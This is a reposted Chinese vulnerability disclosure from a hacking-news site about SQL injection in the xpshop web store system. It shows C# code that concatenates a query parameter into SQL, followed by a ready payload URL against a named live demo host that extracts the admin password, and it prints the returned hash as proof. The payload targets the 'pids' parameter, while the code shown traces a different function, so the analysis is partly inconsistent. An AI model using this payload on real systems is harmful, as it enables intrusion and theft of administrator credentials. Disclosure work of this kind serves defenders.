记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

xpshop网店系统sql注入(demo演示)

2016-02-17 09:20

漏洞作者: 不能忍

详细说明:

漏洞位置:xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)
		{
			if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"]))
			{
				string text = base.Request.QueryString["Action"];
				if (text != null)
				{
					if (!(text == "GetImg"))
					{
						if (text == "GetPackageGID")
						{
							base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));
						}
					}
					else
					{
						this.GetImg(base.Request.QueryString["pids"]);
					}

跟进函数GetPackagePdtGID:

public int GetPackagePdtGID(int productID)

		{

			object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "select GoodsID from Goods where ProductID = " + productID, null);

			return (obj != null) ? ((int)obj) : 0;

		}

 

没过滤直接进库,直接回显的!

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)–

漏洞证明:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)–

15163708e38982fcb6bb68a83287ad5c51236c81[1]

知识来源: 0day5.com/archives/3743

阅读:82157 | 评论:0 | 标签:ASP.NET Sql SQL注入 xpshop 注入 系统 网店

想收藏或者和大家分享这篇好文章→复制链接地址

“xpshop网店系统sql注入(demo演示)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词